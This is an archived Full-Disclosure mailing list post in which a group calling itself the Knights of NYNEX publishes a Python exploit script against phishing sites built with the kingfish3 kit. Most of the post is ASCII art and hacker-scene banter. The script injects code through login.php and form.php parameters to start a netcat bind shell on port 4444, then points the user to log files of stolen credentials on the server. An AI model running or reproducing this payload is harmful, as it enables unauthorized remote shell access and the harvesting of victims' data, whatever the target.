lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <uR8VyTbnz9H4EbFy3zHUB6BZhyIQZtqyoMCynTXL2YcwZSXQsITTajev3pxyytCECzGPaun5W-ftPKUfocly8aGLL-SgXuNzKaYl6WHPUKk=@protonmail.com>
Date: Thu, 04 Nov 2021 02:05:58 +0000
From: Knights of Nynex via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] The Knights of NYNEX presents: Song of the siren

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# usage: ./sirensong.py http://phishingsiteurl
text='''
-o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o-

                                    ████
                                    ██████
                                    ██████
                                      ██
                                      ██
                ██████                ▓▓                  ██
                ██████                ██                ██████
                  ██▓▓                ██                ██████
                    ▓▓                ██                ▒▒
                    ██              ████                ▓▓
                    ██              ██████            ██▓▓
                    ████            ██████          ▓▓████                  ██
  ▓▓                ██████        ████████          ████▓▓                ██████
██████              ████████    ▓▓██████████      ████████                ██████
██████              ██████████████████████████████████████               ██
    ██            ▓▓██████████████████████████████████████              ██
      ██          ██████████████████████████████████████████          ████
      ████████▓▓████████████████████████████████████████████████████████
      ██████████████████████████████████████████████████████████████████
        ██████████████████████████████████████████████████████████████
        ██████████████████████████████████████████████████████████████
          █████████████████████ _  _ _ _   __  █████████████████████
          ████████▓▓           [|\|\\/[|\|[|-\\/          ▓▓████████
         .o oOOOOOOOo              ''      `-''`                 OOOo
         Ob.OOK!OOOo  OOOo.      oOOo.                      .adOOK!O4O
         OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'DO
         OOP.oOOOOOOOOOOO "0OOOFINDOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOA'
         `O'OOOO'     `OOOOo"OOOOEGGSOOO` .adOOOOOOOOO"oOOO'    `OOOWo
         .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `NO
         OOOOO                 '"OOOOOOOOOOOOOOOO"`                oSO
        oOOOOOba.                .adOOOOOOOOOOba               .adOOTOo.
       oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@...OOOOOba.     .adOOOOOOOAOOOO
      Ox4141414141OOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOROOO
      "OOOO"       "YOoOOKNIGHTSODOO"`  .   '"OOOONYNEXOOOoOY"     "AUO"
         Y           'OOOOOOOOOOOOOO: .oOFo. :OOOOOOOOOOO?'         :`
         :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
         .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                      '&o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                           `$"  `OOOO' `O"Y ' `OHTP'  o             .
         .                  .     OP"          : o     .
                                   :
                                   .                             4E 59 4E 45 58
            _
  _        | |
 | |_______|  \---------------------------------------------------------------\
 | |_______|  =[ The Knights of NYNEX presents: Song of the siren ]============>
 |_|       |  /~~~~~~~~~`+.~.+.+.+~+.+~+~+.+~+~+~+~+.+~+~+~+~+~+~+~+.`~~~~~~~~/
           |_|
'''
m='''
!!!HAILTOTHEKING!!HAILTOTHEKING!!HAILTOTHEKING!!HAILTOTHEKING!!HAILTOTHEKING!!!


-o==[=====> META <=====]==o-
Is it a bird? is it a plane? No, it's a lame phisher about to get pwned!
 - https://github.com/termux-lab/kingfish3


    .-.                                                                  .
    |/|                                                                 / \
    |/|      Wh3r3'5 th3 5c3n3 4t? Wh3n d1d 5ki11s g3t r3pl4c3d by     ( | )
    |/|      p4st1ng p4yl04d5 fr0m 7ex7 f1l3s 1nt7o w3b f0rm5, h0pi1ng | | |
    |/|      f0r 4 f3w d0ll4rs? Why 15 3xpl0i7-db full 0f s3lf-0wn     | | |
 ___|_|___   3xpl0i7s p4s71ng l0ng str1ng5 1n7o d3sk70p 4pp5?!?!?!     | | |
 )  ___  (   Wh3r3 4r3 7h3 1u1z? 7h3 313373? 7h3y c4n'7 4ll b3 und3r-  | | |
/__/ | \__\  gr0und 5e11ing 0-cl1ck 3xpl0i7s 0n 7h3 m3d10cre 0hd4yz    | | |
   ) | (     m4rk3t? I7 s33m5 7h3 5c3n3 h4s g0n3 7h3 w4y 0f s0c1al     | | |
   ) | (     m3d14, t00 bu5y d00m 5cr0ll1ng 4nd b31ng 0u7r4g3d 7h47    | | |
   ) | (     y0u'v3 f0rgo77en t0 h4v3 fun.                             | | |
   ) | (                                                               | | |
   | | |     Th3 Kn1ght5 0f Nyn3x w0u1d l1k3 t0 r3m1nd y0u 7h47 th3r3  | | |
   | | |     15 5t1ll t1m3, 5t1ll h0p3. 4 w0r1d wh3r3 4ll 65535 p0rt5  | | |
   | | |     0n 3v3ry b0x3n c4n b3 4 r3m0t3 R007 5h3ll!!!              | | |
   | | |                                                               | | |
   | | |     4ll 17 t4k3s 15 7h3 w1ll1ngn3s5 t0 l34rn 4nd t0 pr0v3     | | |
   | | |     7h47 y0u d1d l34rn s0m37h1ng, by 5p3w1ng 4sc11-4r7,       | | |
   | | |     5h3ll5 4nd 0d4y 5pl017s 3v3rywh3r3.                       ) | (
   | | |                                                               ) | (
   | | |     - W3 D0!                                                  ) | (
   | | |             >>>  R3m3mb3r k1d5, d0 17  <<<                 ___) | (___
   | | |             >>>     4 73H LULZ!        <<<                 \  \___/  /
   | | |                                                             )_______(
   | | |                                                                |/|
   | | |   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  |/|
   ( | )   If you want to be elite, you've got to do a righteous hack!  |/|
    \ /    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  |/|
     '                                                                  '-'

01101101011011110111011001001011011011110100111000101100011100100111001101110000

-o==[=====> EXPLOIT <=====]==o-
'''
import requests
import sys
import time

print(text)

if (len(sys.argv) < 2):
    print("RTFM already!")
    exit(1)

print("Singing the siren song to "+sys.argv[1])
shell2="nc+-e+/bin/bash+-lp+4444+%26"
shell="import+os;os.system('"+shell2+"')"
pre="', '', ''])\n"
pad="\nprint('PWNED by the Knights of NYNEX');os._exit(1)\nx.add_row(['DIELIKE','THEREST"
payload = {'pass': 'messwiththebest'+pre+shell+pad, 'email': 'pwntby@...ghtsof.nynex'}
# try both options
print("First verse...")
try:
    r = requests.post(sys.argv[1]+"/login.php?namest=pwntby@...ghtsof.nynex&passwordst=messwiththebest"+pre+shell+pad, data=payload,timeout=3)
except:
  print("O-oooooooooo AAAAE-A-A-I-A-U- JO-oooooooooooo AAE-O-A-A-U-U-A- E-eee-ee-eee AAAAE-A-E-I-E-A- JO-ooo-oo-oo-oo")
print("ooo OOOOO aaaaa AAAAAA iiii iiiiii ooooo oOOOooOO")
print("Second verse")
time.sleep(2)
try:
    r = requests.get(sys.argv[1]+"/form.php?hello=pwntby@...ghtsof.nynex&phone=htp;"+shell2, timeout=3)
except:
  print("O-oooooooooo AAAAE-A-A-I-A-U- JO-oooooooooooo AAE-O-A-A-U-U-A- E-eee-ee-eee AAAAE-A-E-I-E-A- JO-ooo-oo-oo-oo")
print("ooeoeooo aiaiaiaia EAEAEAEA aaahhaah eeeee ouououou sssshshshsh")
print("Time to sleep...\n")
time.sleep(2)

print("-o==[=====> The charmed phisherman's shell should be listening on port 4444...")
print("-o==[=====> remember to grab all the phish in any files named data.log, bd.log and log.log...\n")
print("HACK THE PLANET!")
print("    HACK THE PLANET!")
print("        HACK THE PLANET!")
print("            HACK THE PLANET!")
print("                HACK THE PLANET!")
print("                    ₁ƛ35fḊ`₴ḟ₴ḣ`½*∑∴,\n\n")

text='''


-o==[=====> GREETZ <=====]==o-
Phantom Phreak - HAIL TO THE KING!
Crash Override/Zero Cool, Acid Burn, Cereal Killer
Lord Nikon, Joey, Blade, Razor

-o==[=====> Respect <=====]==o-
LoD, gobbles, TESO, w00w00, L0pth, cDc, THC, ducksec
Phrack, tmp.Out, zf0, el8, h0n0

-o==[=====> 凸( •̀_•́ )凸 <=====]==o-
The plague, god, Agent Dick Gill, Techno weenie, Ellingson Mineral Corporation
All the charlatans, nazis, incels and illmob losers!

-o==[=====> SIG <=====]==o-
4e4f534f4349414c4d454449414f4e4c595348454c4c535a27fb1845fde3cdd4f20ff7f120d84824
4c6268756e69726765726e71686362617a6c71627a6e76616e617161626a7a686667666873737265
c1a5c71086a3add04c4cae7108633c6395d3df7cb645e3b3b9504f24f34a105841e996cf12050ff4
bbb56df69c607fbe665e665e665e665e66548ef3ab3695aa681699599625dbab6ea03c54dfd1d4e8
ACABe0fa2aa56ff1daec7e183ba66de85761c49aba13db1ebbdaa4cafc8643339833bfc447709c0a
67eddc53e6bc566060b0f6d54dad129bf9225e32f9fa3fe606e1bf570fc7c09ecf25fa3152b8313b
8ee9aa5cef008b204cdfa22e40b6739e3b9bf8339739bbcaee7e4ba9274f1a22b819e12113853211
fb478f7d7dca6373863c9fcd7307d75d5770268c435076783c545f491c0336b2e15083bb0f47d478
'''

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists